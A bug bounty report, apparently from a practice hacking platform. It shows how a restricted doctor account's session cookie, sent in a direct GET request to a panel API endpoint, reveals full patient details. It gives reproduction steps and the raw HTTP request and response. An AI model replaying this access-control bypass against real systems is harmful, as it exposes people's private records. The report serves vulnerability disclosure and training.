BugBountyHunter

Using the credentials as shown in https://www.bugbountyhunter.com/hackevents/report?id=123, it was understood that it was a restricted doctors account where full details aren't visible.

However, you could send a direct request to GET /drpanel/drapi/query.php?aptid=56911493 using the restricted accounts cookie to view the full account information.

To reproduce:

• Login with the credentials obtained using the methods shown in report #123.

• On a new incognito tab, login with the drAdmin credentials given by bbhunter.

• Once logged in, keep a note of your cookie which starts with drps. It should look something like drps=25bbddaccaa27a8bc23b6c212

• Now on the incognito tab, on the dashboard, click on the appointment details and intercept the proxy.

• Now, make the same request with the restricted users cookie, drps=25bbddaccaa27a8bc23b6c212 in this case.

GET /drpanel/drapi/query.php?aptid=56911493 HTTP/1.1
Host: firstbloodhackers.com:49387
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Prefer: safe
DNT: 1
Connection: close
Referer: http://firstbloodhackers.com:49387/drpanel/index.php
Cookie: drps=25bbddaccaa27a8bc23b6c212

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 10 May 2021 14:51:23 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 219

For safeguarding reasons please do not leave this alert on your screen when unattended! Use information below to verify patients over the phone.

Name: nanictica nacntiaa
Address: asdf d
Telephone: 54554
DOB: 05/26/2021

As you can see, this proves that the restricted user can view the details of the user.